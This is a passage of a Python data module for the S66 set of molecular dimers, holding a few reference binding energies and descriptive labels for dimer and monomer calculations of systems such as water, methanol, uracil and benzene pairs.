BIND['%s-%s' % (dbse, '64' )] = -2.999
BIND['%s-%s' % (dbse, '65' )] = -3.991
BIND['%s-%s' % (dbse, '66' )] = -3.968
# <<< Comment Lines >>>
TAGL = {}
TAGL['%s-%s' % (dbse, '1' )] = """Water Dimer """
TAGL['%s-%s-dimer' % (dbse, '1' )] = """Dimer from Water Dimer """
TAGL['%s-%s-monoA-CP' % (dbse, '1' )] = """Monomer A from Water Dimer """
TAGL['%s-%s-monoB-CP' % (dbse, '1' )] = """Monomer B from Water Dimer """
TAGL['%s-%s-monoA-unCP' % (dbse, '1' )] = """Monomer A from Water Dimer """
TAGL['%s-%s-monoB-unCP' % (dbse, '1' )] = """Monomer B from Water Dimer """
TAGL['%s-%s' % (dbse, '2' )] = """Water-Methanol """
TAGL['%s-%s-dimer' % (dbse, '2' )] = """Dimer from Water-Methanol """
TAGL['%s-%s-monoA-CP' % (dbse, '2' )] = """Monomer A from Water-Methanol """
TAGL['%s-%s-monoB-CP' % (dbse, '2' )] = """Monomer B from Water-Methanol """
TAGL['%s-%s-monoA-unCP' % (dbse, '2' )] = """Monomer A from Water-Methanol """
TAGL['%s-%s-monoB-unCP' % (dbse, '2' )] = """Monomer B from Water-Methanol """
TAGL['%s-%s' % (dbse, '3' )] = """Water-Methylamine """
TAGL['%s-%s-dimer' % (dbse, '3' )] = """Dimer from Water-Methylamine """
TAGL['%s-%s-monoA-CP' % (dbse, '3' )] = """Monomer A from Water-Methylamine """
TAGL['%s-%s-monoB-CP' % (dbse, '3' )] = """Monomer B from Water-Methylamine """
TAGL['%s-%s-monoA-unCP' % (dbse, '3' )] = """Monomer A from Water-Methylamine """
TAGL['%s-%s-monoB-unCP' % (dbse, '3' )] = """Monomer B from Water-Methylamine """
TAGL['%s-%s' % (dbse, '4' )] = """Water-N-methylacetamide """
TAGL['%s-%s-dimer' % (dbse, '4' )] = """Dimer from Water-N-methylacetamide """
TAGL['%s-%s-monoA-CP' % (dbse, '4' )] = """Monomer A from Water-N-methylacetamide """
TAGL['%s-%s-monoB-CP' % (dbse, '4' )] = """Monomer B from Water-N-methylacetamide """
TAGL['%s-%s-monoA-unCP' % (dbse, '4' )] = """Monomer A from Water-N-methylacetamide """
TAGL['%s-%s-monoB-unCP' % (dbse, '4' )] = """Monomer B from Water-N-methylacetamide """
TAGL['%s-%s' % (dbse, '5' )] = """Methanol Dimer """
TAGL['%s-%s-dimer' % (dbse, '5' )] = """Dimer from Methanol Dimer """
TAGL['%s-%s-monoA-CP' % (dbse, '5' )] = """Monomer A from Methanol Dimer """
TAGL['%s-%s-monoB-CP' % (dbse, '5' )] = """Monomer B from Methanol Dimer """
TAGL['%s-%s-monoA-unCP' % (dbse, '5' )] = """Monomer A from Methanol Dimer """
TAGL['%s-%s-monoB-unCP' % (dbse, '5' )] = """Monomer B from Methanol Dimer """
TAGL['%s-%s' % (dbse, '6' )] = """Methanol-Methylamine """
TAGL['%s-%s-dimer' % (dbse, '6' )] = """Dimer from Methanol-Methylamine """
TAGL['%s-%s-monoA-CP' % (dbse, '6' )] = """Monomer A from Methanol-Methylamine """
TAGL['%s-%s-monoB-CP' % (dbse, '6' )] = """Monomer B from Methanol-Methylamine """
TAGL['%s-%s-monoA-unCP' % (dbse, '6' )] = """Monomer A from Methanol-Methylamine """
TAGL['%s-%s-monoB-unCP' % (dbse, '6' )] = """Monomer B from Methanol-Methylamine """
TAGL['%s-%s' % (dbse, '7' )] = """Methanol-N-methylacetamide """
TAGL['%s-%s-dimer' % (dbse, '7' )] = """Dimer from Methanol-N-methylacetamide """
TAGL['%s-%s-monoA-CP' % (dbse, '7' )] = """Monomer A from Methanol-N-methylacetamide """
TAGL['%s-%s-monoB-CP' % (dbse, '7' )] = """Monomer B from Methanol-N-methylacetamide """
TAGL['%s-%s-monoA-unCP' % (dbse, '7' )] = """Monomer A from Methanol-N-methylacetamide """
TAGL['%s-%s-monoB-unCP' % (dbse, '7' )] = """Monomer B from Methanol-N-methylacetamide """
TAGL['%s-%s' % (dbse, '8' )] = """Methanol-Water """
TAGL['%s-%s-dimer' % (dbse, '8' )] = """Dimer from Methanol-Water """
TAGL['%s-%s-monoA-CP' % (dbse, '8' )] = """Monomer A from Methanol-Water """
TAGL['%s-%s-monoB-CP' % (dbse, '8' )] = """Monomer B from Methanol-Water """
TAGL['%s-%s-monoA-unCP' % (dbse, '8' )] = """Monomer A from Methanol-Water """
TAGL['%s-%s-monoB-unCP' % (dbse, '8' )] = """Monomer B from Methanol-Water """
TAGL['%s-%s' % (dbse, '9' )] = """Methylamine-Methanol """
TAGL['%s-%s-dimer' % (dbse, '9' )] = """Dimer from Methylamine-Methanol """
TAGL['%s-%s-monoA-CP' % (dbse, '9' )] = """Monomer A from Methylamine-Methanol """
TAGL['%s-%s-monoB-CP' % (dbse, '9' )] = """Monomer B from Methylamine-Methanol """
TAGL['%s-%s-monoA-unCP' % (dbse, '9' )] = """Monomer A from Methylamine-Methanol """
TAGL['%s-%s-monoB-unCP' % (dbse, '9' )] = """Monomer B from Methylamine-Methanol """
TAGL['%s-%s' % (dbse, '10' )] = """Methylamine Dimer """
TAGL['%s-%s-dimer' % (dbse, '10' )] = """Dimer from Methylamine Dimer """
TAGL['%s-%s-monoA-CP' % (dbse, '10' )] = """Monomer A from Methylamine Dimer """
TAGL['%s-%s-monoB-CP' % (dbse, '10' )] = """Monomer B from Methylamine Dimer """
TAGL['%s-%s-monoA-unCP' % (dbse, '10' )] = """Monomer A from Methylamine Dimer """
TAGL['%s-%s-monoB-unCP' % (dbse, '10' )] = """Monomer B from Methylamine Dimer """
TAGL['%s-%s' % (dbse, '11' )] = """Methylamine-N-methylacetamide """
TAGL['%s-%s-dimer' % (dbse, '11' )] = """Dimer from Methylamine-N-methylacetamide """
TAGL['%s-%s-monoA-CP' % (dbse, '11' )] = """Monomer A from Methylamine-N-methylacetamide """
TAGL['%s-%s-monoB-CP' % (dbse, '11' )] = """Monomer B from Methylamine-N-methylacetamide """
TAGL['%s-%s-monoA-unCP' % (dbse, '11' )] = """Monomer A from Methylamine-N-methylacetamide """
TAGL['%s-%s-monoB-unCP' % (dbse, '11' )] = """Monomer B from Methylamine-N-methylacetamide """
TAGL['%s-%s' % (dbse, '12' )] = """Methylamine-Water """
TAGL['%s-%s-dimer' % (dbse, '12' )] = """Dimer from Methylamine-Water """
TAGL['%s-%s-monoA-CP' % (dbse, '12' )] = """Monomer A from Methylamine-Water """
TAGL['%s-%s-monoB-CP' % (dbse, '12' )] = """Monomer B from Methylamine-Water """
TAGL['%s-%s-monoA-unCP' % (dbse, '12' )] = """Monomer A from Methylamine-Water """
TAGL['%s-%s-monoB-unCP' % (dbse, '12' )] = """Monomer B from Methylamine-Water """
TAGL['%s-%s' % (dbse, '13' )] = """N-methylacetamide-Methanol """
TAGL['%s-%s-dimer' % (dbse, '13' )] = """Dimer from N-methylacetamide-Methanol """
TAGL['%s-%s-monoA-CP' % (dbse, '13' )] = """Monomer A from N-methylacetamide-Methanol """
TAGL['%s-%s-monoB-CP' % (dbse, '13' )] = """Monomer B from N-methylacetamide-Methanol """
TAGL['%s-%s-monoA-unCP' % (dbse, '13' )] = """Monomer A from N-methylacetamide-Methanol """
TAGL['%s-%s-monoB-unCP' % (dbse, '13' )] = """Monomer B from N-methylacetamide-Methanol """
TAGL['%s-%s' % (dbse, '14' )] = """N-methylacetamide-Methylamine """
TAGL['%s-%s-dimer' % (dbse, '14' )] = """Dimer from N-methylacetamide-Methylamine """
TAGL['%s-%s-monoA-CP' % (dbse, '14' )] = """Monomer A from N-methylacetamide-Methylamine """
TAGL['%s-%s-monoB-CP' % (dbse, '14' )] = """Monomer B from N-methylacetamide-Methylamine """
TAGL['%s-%s-monoA-unCP' % (dbse, '14' )] = """Monomer A from N-methylacetamide-Methylamine """
TAGL['%s-%s-monoB-unCP' % (dbse, '14' )] = """Monomer B from N-methylacetamide-Methylamine """
TAGL['%s-%s' % (dbse, '15' )] = """N-methylacetamide Dimer """
TAGL['%s-%s-dimer' % (dbse, '15' )] = """Dimer from N-methylacetamide Dimer """
TAGL['%s-%s-monoA-CP' % (dbse, '15' )] = """Monomer A from N-methylacetamide Dimer """
TAGL['%s-%s-monoB-CP' % (dbse, '15' )] = """Monomer B from N-methylacetamide Dimer """
TAGL['%s-%s-monoA-unCP' % (dbse, '15' )] = """Monomer A from N-methylacetamide Dimer """
TAGL['%s-%s-monoB-unCP' % (dbse, '15' )] = """Monomer B from N-methylacetamide Dimer """
TAGL['%s-%s' % (dbse, '16' )] = """N-methylacetamide-Water """
TAGL['%s-%s-dimer' % (dbse, '16' )] = """Dimer from N-methylacetamide-Water """
TAGL['%s-%s-monoA-CP' % (dbse, '16' )] = """Monomer A from N-methylacetamide-Water """
TAGL['%s-%s-monoB-CP' % (dbse, '16' )] = """Monomer B from N-methylacetamide-Water """
TAGL['%s-%s-monoA-unCP' % (dbse, '16' )] = """Monomer A from N-methylacetamide-Water """
TAGL['%s-%s-monoB-unCP' % (dbse, '16' )] = """Monomer B from N-methylacetamide-Water """
TAGL['%s-%s' % (dbse, '17' )] = """Uracil Dimer, HB """
TAGL['%s-%s-dimer' % (dbse, '17' )] = """Dimer from Uracil Dimer, HB """
TAGL['%s-%s-monoA-CP' % (dbse, '17' )] = """Monomer A from Uracil Dimer, HB """
TAGL['%s-%s-monoB-CP' % (dbse, '17' )] = """Monomer B from Uracil Dimer, HB """
TAGL['%s-%s-monoA-unCP' % (dbse, '17' )] = """Monomer A from Uracil Dimer, HB """
TAGL['%s-%s-monoB-unCP' % (dbse, '17' )] = """Monomer B from Uracil Dimer, HB """
TAGL['%s-%s' % (dbse, '18' )] = """Water-Pyridine """
TAGL['%s-%s-dimer' % (dbse, '18' )] = """Dimer from Water-Pyridine """
TAGL['%s-%s-monoA-CP' % (dbse, '18' )] = """Monomer A from Water-Pyridine """
TAGL['%s-%s-monoB-CP' % (dbse, '18' )] = """Monomer B from Water-Pyridine """
TAGL['%s-%s-monoA-unCP' % (dbse, '18' )] = """Monomer A from Water-Pyridine """
TAGL['%s-%s-monoB-unCP' % (dbse, '18' )] = """Monomer B from Water-Pyridine """
TAGL['%s-%s' % (dbse, '19' )] = """Methanol-Pyridine """
TAGL['%s-%s-dimer' % (dbse, '19' )] = """Dimer from Methanol-Pyridine """
TAGL['%s-%s-monoA-CP' % (dbse, '19' )] = """Monomer A from Methanol-Pyridine """
TAGL['%s-%s-monoB-CP' % (dbse, '19' )] = """Monomer B from Methanol-Pyridine """
TAGL['%s-%s-monoA-unCP' % (dbse, '19' )] = """Monomer A from Methanol-Pyridine """
TAGL['%s-%s-monoB-unCP' % (dbse, '19' )] = """Monomer B from Methanol-Pyridine """
TAGL['%s-%s' % (dbse, '20' )] = """Acetic Acid Dimer """
TAGL['%s-%s-dimer' % (dbse, '20' )] = """Dimer from Acetic Acid Dimer """
TAGL['%s-%s-monoA-CP' % (dbse, '20' )] = """Monomer A from Acetic Acid Dimer """
TAGL['%s-%s-monoB-CP' % (dbse, '20' )] = """Monomer B from Acetic Acid Dimer """
TAGL['%s-%s-monoA-unCP' % (dbse, '20' )] = """Monomer A from Acetic Acid Dimer """
TAGL['%s-%s-monoB-unCP' % (dbse, '20' )] = """Monomer B from Acetic Acid Dimer """
TAGL['%s-%s' % (dbse, '21' )] = """Acetamide Dimer """
TAGL['%s-%s-dimer' % (dbse, '21' )] = """Dimer from Acetamide Dimer """
TAGL['%s-%s-monoA-CP' % (dbse, '21' )] = """Monomer A from Acetamide Dimer """
TAGL['%s-%s-monoB-CP' % (dbse, '21' )] = """Monomer B from Acetamide Dimer """
TAGL['%s-%s-monoA-unCP' % (dbse, '21' )] = """Monomer A from Acetamide Dimer """
TAGL['%s-%s-monoB-unCP' % (dbse, '21' )] = """Monomer B from Acetamide Dimer """
TAGL['%s-%s' % (dbse, '22' )] = """Acetic Acid-Uracil """
TAGL['%s-%s-dimer' % (dbse, '22' )] = """Dimer from Acetic Acid-Uracil """
TAGL['%s-%s-monoA-CP' % (dbse, '22' )] = """Monomer A from Acetic Acid-Uracil """
TAGL['%s-%s-monoB-CP' % (dbse, '22' )] = """Monomer B from Acetic Acid-Uracil """
TAGL['%s-%s-monoA-unCP' % (dbse, '22' )] = """Monomer A from Acetic Acid-Uracil """
TAGL['%s-%s-monoB-unCP' % (dbse, '22' )] = """Monomer B from Acetic Acid-Uracil """
TAGL['%s-%s' % (dbse, '23' )] = """Acetamide-Uracil """
TAGL['%s-%s-dimer' % (dbse, '23' )] = """Dimer from Acetamide-Uracil """
TAGL['%s-%s-monoA-CP' % (dbse, '23' )] = """Monomer A from Acetamide-Uracil """
TAGL['%s-%s-monoB-CP' % (dbse, '23' )] = """Monomer B from Acetamide-Uracil """
TAGL['%s-%s-monoA-unCP' % (dbse, '23' )] = """Monomer A from Acetamide-Uracil """
TAGL['%s-%s-monoB-unCP' % (dbse, '23' )] = """Monomer B from Acetamide-Uracil """
TAGL['%s-%s' % (dbse, '24' )] = """Benzene Dimer, pi-pi """
TAGL['%s-%s-dimer' % (dbse, '24' )] = """Dimer from Benzene Dimer, pi-pi """
TAGL['%s-%s-monoA-CP' % (dbse, '24' )] = """Monomer A from Benzene Dimer, pi-pi """
TAGL['%s-%s-monoB-CP' % (dbse, '24' )] = """Monomer B from Benzene Dimer, pi-pi """
TAGL['%s-%s-monoA-unCP' % (dbse, '24' )] = """Monomer A from Benzene Dimer, pi-pi """
TAGL['%s-%s-monoB-unCP' % (dbse, '24' )] = """Monomer B from Benzene Dimer, pi-pi """
TAGL['%s-%s' % (dbse, '25' )] = """Pyridine Dimer, pi-pi """
TAGL['%s-%s-dimer' % (dbse, '25' )] = """Dimer from Pyridine Dimer, pi-pi """
TAGL['%s-%s-monoA-CP' % (dbse, '25' )] = """Monomer A from Pyridine Dimer, pi-pi """
TAGL['%s-%s-monoB-CP' % (dbse, '25' )] = """Monomer B from Pyridine Dimer, pi-pi """
TAGL['%s-%s-monoA-unCP' % (dbse, '25' )] = """Monomer A from Pyridine Dimer, pi-pi """
TAGL['%s-%s-monoB-unCP' % (dbse, '25' )] = """Monomer B from Pyridine Dimer, pi-pi """
TAGL['%s-%s' % (dbse, '26' )] = """Uracil Dimer, pi-pi """
TAGL['%s-%s-dimer' % (dbse, '26' )] = """Dimer from Uracil Dimer, pi-pi """
TAGL['%s-%s-monoA-CP' % (dbse, '26' )] = """Monomer A from Uracil Dimer, pi-pi """
TAGL['%s-%s-monoB-CP' % (dbse, '26' )] = """Monomer B from Uracil Dimer, pi-pi """
TAGL['%s-%s-monoA-unCP' % (dbse, '26' )] = """Monomer A from Uracil Dimer, pi-pi """
TAGL['%s-%s-monoB-unCP' % (dbse, '26' )] = """Monomer B from Uracil Dimer, pi-pi """
TAGL['%s-%s' % (dbse, '27' )] = """Benzene-Pyridine, pi-pi """
TAGL['%s-%s-dimer' % (dbse, '27' )] = """Dimer from Benzene-Pyridine, pi-pi """
TAGL['%s-%s-monoA-CP' % (dbse, '27' )] = """Monomer A from Benzene-Pyridine, pi-pi """
TAGL['%s-%s-monoB-CP' % (dbse, '27' )] = """Monomer B from Benzene-Pyridine, pi-pi """
TAGL['%s-%s-monoA-unCP' % (dbse, '27' )] = """Monomer A from Benzene-Pyridine, pi-pi """
TAGL['%s-%s-monoB-unCP' % (dbse, '27' )] = """Monomer B from Benzene-Pyridine, pi-pi """
TAGL['%s-%s' % (dbse, '28' )] = """Benzene-Uracil, pi-pi """
TAGL['%s-%s-dimer' % (dbse, '28' )] = """Dimer from Benzene-Uracil, pi-pi """
TAGL['%s-%s-monoA-CP' % (dbse, '28' )] = """Monomer A from Benzene-Uracil, pi-pi """
TAGL['%s-%s-monoB-CP' % (dbse, '28' )] = """Monomer B from Benzene-Uracil, pi-pi """
TAGL['%s-%s-monoA-unCP' % (dbse, '28' )] = """Monomer A from Benzene-Uracil, pi-pi """
TAGL['%s-%s-monoB-unCP' % (dbse, '28' )] = """Monomer B from Benzene-Uracil, pi-pi """
TAGL['%s-%s' % (dbse, '29' )] = """Pyridine-Uracil, pi-pi """
TAGL['%s-%s-dimer' % (dbse, '29' )] = """Dimer from Pyridine-Uracil, pi-pi """
TAGL['%s-%s-monoA-CP' % (dbse, '29' )] = """Monomer A from Pyridine-Uracil, pi-pi """
TAGL['%s-%s-monoB-CP' % (dbse, '29' )] = """Monomer B from Pyridine-Uracil, pi-pi """
TAGL['%s-%s-monoA-unCP' % (dbse, '29' )] = """Monomer A from Pyridine-Uracil, pi-pi """
TAGL['%s-%s-monoB-unCP' % (dbse, '29' )] = """Monomer B from Pyridine-Uracil, pi-pi """
TAGL['%s-%s' % (dbse, '30' )] = """Benzene-Ethene """
TAGL['%s-%s-dimer' % (dbse, '30' )] = """Dimer from Benzene-Ethene """
TAGL['%s-%s-monoA-CP' % (dbse, '30' )] = """Monomer A from Benzene-Ethene """
TAGL['%s-%s-monoB-CP' % (dbse, '30' )] = """Monomer B from Benzene-Ethene """
TAGL['%s-%s-monoA-unCP' % (dbse, '30' )] = """Monomer A from Benzene-Ethene """
TAGL['%s-%s-monoB-unCP' % (dbse, '30' )] = """Monomer B from Benzene-Ethene """
TAGL['%s-%s' % (dbse, '31' )] = """Uracil-Ethene """
TAGL['%s-%s-dimer' % (dbse, '31' )] = """Dimer from Uracil-Ethene """
TAGL['%s-%s-monoA-CP' % (dbse, '31' )] = """Monomer A from Uracil-Ethene """
TAGL['%s-%s-monoB-CP' % (dbse, '31' )] = """Monomer B from Uracil-Ethene """
TAGL['%s-%s-monoA-unCP' % (dbse, '31' )] = """Monomer A from Uracil-Ethene """
TAGL['%s-%s-monoB-unCP' % (dbse, '31' )] = """Monomer B from Uracil-Ethene """
TAGL['%s-%s' % (dbse, '32' )] = """Uracil-Ethyne """
TAGL['%s-%s-dimer' % (dbse, '32' )] = """Dimer from Uracil-Ethyne """
TAGL['%s-%s-monoA-CP' % (dbse, '32' )] = """Monomer A from Uracil-Ethyne """
TAGL['%s-%s-monoB-CP' % (dbse, '32' )] = """Monomer B from Uracil-Ethyne """
TAGL['%s-%s-monoA-unCP' % (dbse, '32' )] = """Monomer A from Uracil-Ethyne """
TAGL['%s-%s-monoB-unCP' % (dbse, '32' )] = """Monomer B from Uracil-Ethyne """
TAGL['%s-%s' % (dbse, '33' )] = """Pyridine-Ethene """
TAGL['%s-%s-dimer' % (dbse, '33' )] = """Dimer from Pyridine-Ethene """
TAGL['%s-%s-monoA-CP' % (dbse, '33' )] = """Monomer A from Pyridine-Ethene """
TAGL['%s-%s-monoB-CP' % (dbse, '33' )] = """Monomer B from Pyridine-Ethene """
TAGL['%s-%s-monoA-unCP' % (dbse, '33' )] = """Monomer A from Pyridine-Ethene """
TAGL['%s-%s-monoB-unCP' % (dbse, '33' )] = """Monomer B from Pyridine-Ethene """
TAGL['%s-%s' % (dbse, '34' )] = """Pentane Dimer """
TAGL['%s-%s-dimer' % (dbse, '34' )] = """Dimer from Pentane Dimer """
TAGL['%s-%s-monoA-CP' % (dbse, '34' )] = """Monomer A from Pentane Dimer """
TAGL['%s-%s-monoB-CP' % (dbse, '34' )] = """Monomer B from Pentane Dimer """
TAGL['%s-%s-monoA-unCP' % (dbse, '34' )] = """Monomer A from Pentane Dimer """
TAGL['%s-%s-monoB-unCP' % (dbse, '34' )] = """Monomer B from Pentane Dimer """
TAGL['%s-%s' % (dbse, '35' )] = """Neopentane-Pentane """
TAGL['%s-%s-dimer' % (dbse, '35' )] = """Dimer from Neopentane-Pentane """
TAGL['%s-%s-monoA-CP' % (dbse, '35' )] = """Monomer A from Neopentane-Pentane """
TAGL['%s-%s-monoB-CP' % (dbse, '35' )] = """Monomer B from Neopentane-Pentane """
TAGL['%s-%s-monoA-unCP' % (dbse, '35' )] = """Monomer A from Neopentane-Pentane """
TAGL['%s-%s-monoB-unCP' % (dbse, '35' )] = """Monomer B from Neopentane-Pentane """
TAGL['%s-%s' % (dbse, '36' )] = """Neopentane Dimer """
TAGL['%s-%s-dimer' % (dbse, '36' )] = """Dimer from Neopentane Dimer """
TAGL['%s-%s-monoA-CP' % (dbse, '36' )] = """Monomer A from Neopentane Dimer """
TAGL['%s-%s-monoB-CP' % (dbse, '36' )] = """Monomer B from Neopentane Dimer """
TAGL['%s-%s-monoA-unCP' % (dbse, '36' )] = """Monomer A from Neopentane Dimer """
TAGL['%s-%s-monoB-unCP' % (dbse, '36' )] = """Monomer B from Neopentane Dimer """
TAGL['%s-%s' % (dbse, '37' )] = """Cyclopentane-Neopentane """
TAGL['%s-%s-dimer' % (dbse, '37' )] = """Dimer from Cyclopentane-Neopentane """
TAGL['%s-%s-monoA-CP' % (dbse, '37' )] = """Monomer A from Cyclopentane-Neopentane """
TAGL['%s-%s-monoB-CP' % (dbse, '37' )] = """Monomer B from Cyclopentane-Neopentane """
TAGL['%s-%s-monoA-unCP' % (dbse, '37' )] = """Monomer A from Cyclopentane-Neopentane """
TAGL['%s-%s-monoB-unCP' % (dbse, '37' )] = """Monomer B from Cyclopentane-Neopentane """
TAGL['%s-%s' % (dbse, '38' )] = """Cyclopentane Dimer """
TAGL['%s-%s-dimer' % (dbse, '38' )] = """Dimer from Cyclopentane Dimer """
TAGL['%s-%s-monoA-CP' % (dbse, '38' )] = """Monomer A from Cyclopentane Dimer """
TAGL['%s-%s-monoB-CP' % (dbse, '38' )] = """Monomer B from Cyclopentane Dimer """
TAGL['%s-%s-monoA-unCP' % (dbse, '38' )] = """Monomer A from Cyclopentane Dimer """
TAGL['%s-%s-monoB-unCP' % (dbse, '38' )] = """Monomer B from Cyclopentane Dimer """
TAGL['%s-%s' % (dbse, '39' )] = """Benzene-Cyclopentane """
TAGL['%s-%s-dimer' % (dbse, '39' )] = """Dimer from Benzene-Cyclopentane """
TAGL['%s-%s-monoA-CP' % (dbse, '39' )] = """Monomer A from Benzene-Cyclopentane """
TAGL['%s-%s-monoB-CP' % (dbse, '39' )] = """Monomer B from Benzene-Cyclopentane """
TAGL['%s-%s-monoA-unCP' % (dbse, '39' )] = """Monomer A from Benzene-Cyclopentane """
TAGL['%s-%s-monoB-unCP' % (dbse, '39' )] = """Monomer B from Benzene-Cyclopentane """
TAGL['%s-%s' % (dbse, '40' )] = """Benzene-Neopentane """
TAGL['%s-%s-dimer' % (dbse, '40' )] = """Dimer from Benzene-Neopentane """
TAGL['%s-%s-monoA-CP' % (dbse, '40' )] = """Monomer A from Benzene-Neopentane """
TAGL['%s-%s-monoB-CP' % (dbse, '40' )] = """Monomer B from Benzene-Neopentane """
TAGL['%s-%s-monoA-unCP' % (dbse, '40' )] = """Monomer A from Benzene-Neopentane """
TAGL['%s-%s-monoB-unCP' % (dbse, '40' )] = """Monomer B from Benzene-Neopentane """
TAGL['%s-%s' % (dbse, '41' )] = """Uracil-Pentane """
TAGL['%s-%s-dimer' % (dbse, '41' )] = """Dimer from Uracil-Pentane """
TAGL['%s-%s-monoA-CP' % (dbse, '41' )] = """Monomer A from Uracil-Pentane """
TAGL['%s-%s-monoB-CP' % (dbse, '41' )] = """Monomer B from Uracil-Pentane """
TAGL['%s-%s-monoA-unCP' % (dbse, '41' )] = """Monomer A from Uracil-Pentane """
TAGL['%s-%s-monoB-unCP' % (dbse, '41' )] = """Monomer B from Uracil-Pentane """
TAGL['%s-%s' % (dbse, '42' )] = """Uracil-Cyclopentane """
TAGL['%s-%s-dimer' % (dbse, '42' )] = """Dimer from Uracil-Cyclopentane """
TAGL['%s-%s-monoA-CP' % (dbse, '42' )] = """Monomer A from Uracil-Cyclopentane """
TAGL['%s-%s-monoB-CP' % (dbse, '42' )] = """Monomer B from Uracil-Cyclopentane """
TAGL['%s-%s-monoA-unCP' % (dbse, '42' )] = """Monomer A from Uracil-Cyclopentane """
TAGL['%s-%s-monoB-unCP' % (dbse, '42' )] = """Monomer B from Uracil-Cyclopentane """
TAGL['%s-%s' % (dbse, '43' )] = """Uracil-Neopentane """
TAGL['%s-%s-dimer' % (dbse, '43' )] = """Dimer from Uracil-Neopentane """
TAGL['%s-%s-monoA-CP' % (dbse, '43' )] = """Monomer A from Uracil-Neopentane """
TAGL['%s-%s-monoB-CP' % (dbse, '43' )] = """Monomer B from Uracil-Neopentane """
TAGL['%s-%s-monoA-unCP' % (dbse, '43' )] = """Monomer A from Uracil-Neopentane """
TAGL['%s-%s-monoB-unCP' % (dbse, '43' )] = """Monomer B from Uracil-Neopentane """
TAGL['%s-%s' % (dbse, '44' )] = """Ethene-Pentane """
TAGL['%s-%s-dimer' % (dbse, '44' )] = """Dimer from Ethene-Pentane """
TAGL['%s-%s-monoA-CP' % (dbse, '44' )] = """Monomer A from Ethene-Pentane """
TAGL['%s-%s-monoB-CP' % (dbse, '44' )] = """Monomer B from Ethene-Pentane """
TAGL['%s-%s-monoA-unCP' % (dbse, '44' )] = """Monomer A from Ethene-Pentane """
TAGL['%s-%s-monoB-unCP' % (dbse, '44' )] = """Monomer B from Ethene-Pentane """
TAGL['%s-%s' % (dbse, '45' )] = """Ethyne-Pentane """
TAGL['%s-%s-dimer' % (dbse, '45' )] = """Dimer from Ethyne-Pentane """
TAGL['%s-%s-monoA-CP' % (dbse, '45' )] = """Monomer A from Ethyne-Pentane """
TAGL['%s-%s-monoB-CP' % (dbse, '45' )] = """Monomer B from Ethyne-Pentane """
TAGL['%s-%s-monoA-unCP' % (dbse, '45' )] = """Monomer A from Ethyne-Pentane """
TAGL['%s-%s-monoB-unCP' % (dbse, '45' )] = """Monomer B from Ethyne-Pentane """
TAGL['%s-%s' % (dbse, '46' )] = """N-methylacetamide-Pentane """
TAGL['%s-%s-dimer' % (dbse, '46' )] = """Dimer from N-methylacetamide-Pentane """
TAGL['%s-%s-monoA-CP' % (dbse, '46' )] = """Monomer A from N-methylacetamide-Pentane """
TAGL['%s-%s-monoB-CP' % (dbse, '46' )] = """Monomer B from N-methylacetamide-Pentane """
TAGL['%s-%s-monoA-unCP' % (dbse, '46' )] = """Monomer A from N-methylacetamide-Pentane """
TAGL['%s-%s-monoB-unCP' % (dbse, '46' )] = """Monomer B from N-methylacetamide-Pentane """
TAGL['%s-%s' % (dbse, '47' )] = """Benzene Dimer, CH-pi """
TAGL['%s-%s-dimer' % (dbse, '47' )] = """Dimer from Benzene Dimer, CH-pi """
TAGL['%s-%s-monoA-CP' % (dbse, '47' )] = """Monomer A from Benzene Dimer, CH-pi """
TAGL['%s-%s-monoB-CP' % (dbse, '47' )] = """Monomer B from Benzene Dimer, CH-pi """
TAGL['%s-%s-monoA-unCP' % (dbse, '47' )] = """Monomer A from Benzene Dimer, CH-pi """
TAGL['%s-%s-monoB-unCP' % (dbse, '47' )] = """Monomer B from Benzene Dimer, CH-pi """
TAGL['%s-%s' % (dbse, '48' )] = """Pyridine Dimer, CH-pi """
TAGL['%s-%s-dimer' % (dbse, '48' )] = """Dimer from Pyridine Dimer, CH-pi """
TAGL['%s-%s-monoA-CP' % (dbse, '48' )] = """Monomer A from Pyridine Dimer, CH-pi """
TAGL['%s-%s-monoB-CP' % (dbse, '48' )] = """Monomer B from Pyridine Dimer, CH-pi """
TAGL['%s-%s-monoA-unCP' % (dbse, '48' )] = """Monomer A from Pyridine Dimer, CH-pi """
TAGL['%s-%s-monoB-unCP' % (dbse, '48' )] = """Monomer B from Pyridine Dimer, CH-pi """
TAGL['%s-%s' % (dbse, '49' )] = """Benzene-Pyridine, CH-pi """
TAGL['%s-%s-dimer' % (dbse, '49' )] = """Dimer from Benzene-Pyridine, CH-pi """
TAGL['%s-%s-monoA-CP' % (dbse, '49' )] = """Monomer A from Benzene-Pyridine, CH-pi """
TAGL['%s-%s-monoB-CP' % (dbse, '49' )] = """Monomer B from Benzene-Pyridine, CH-pi """
TAGL['%s-%s-monoA-unCP' % (dbse, '49' )] = """Monomer A from Benzene-Pyridine, CH-pi """
TAGL['%s-%s-monoB-unCP' % (dbse, '49' )] = """Monomer B from Benzene-Pyridine, CH-pi """
TAGL['%s-%s' % (dbse, '50' )] = """Benzene-Ethyne, CH-pi """
TAGL['%s-%s-dimer' % (dbse, '50' )] = """Dimer from Benzene-Ethyne, CH-pi """
TAGL['%s-%s-monoA-CP' % (dbse, '50' )] = """Monomer A from Benzene-Ethyne, CH-pi """
TAGL['%s-%s-monoB-CP' % (dbse, '50' )] = """Monomer B from Benzene-Ethyne, CH-pi """
TAGL['%s-%s-monoA-unCP' % (dbse, '50' )] = """Monomer A from Benzene-Ethyne, CH-pi """
TAGL['%s-%s-monoB-unCP' % (dbse, '50' )] = """Monomer B from Benzene-Ethyne, CH-pi """
TAGL['%s-%s' % (dbse, '51' )] = """Ethyne Dimer, CH-pi """
TAGL['%s-%s-dimer' % (dbse, '51' )] = """Dimer from Ethyne Dimer, CH-pi """
TAGL['%s-%s-monoA-CP' % (dbse, '51' )] = """Monomer A from Ethyne Dimer, CH-pi """
TAGL['%s-%s-monoB-CP' % (dbse, '51' )] = """Monomer B from Ethyne Dimer, CH-pi """
TAGL['%s-%s-monoA-unCP' % (dbse, '51' )] = """Monomer A from Ethyne Dimer, CH-pi """
TAGL['%s-%s-monoB-unCP' % (dbse, '51' )] = """Monomer B from Ethyne Dimer, CH-pi """
TAGL['%s-%s' % (dbse, '52' )] = """Benzene-Acetic Acid, OH-pi """
TAGL['%s-%s-dimer' % (dbse, '52' )] = """Dimer from Benzene-Acetic Acid, OH-pi """
TAGL['%s-%s-monoA-CP' % (dbse, '52' )] = """Monomer A from Benzene-Acetic Acid, OH-pi """
TAGL['%s-%s-monoB-CP' % (dbse, '52' )] = """Monomer B from Benzene-Acetic Acid, OH-pi """
TAGL['%s-%s-monoA-unCP' % (dbse, '52' )] = """Monomer A from Benzene-Acetic Acid, OH-pi """
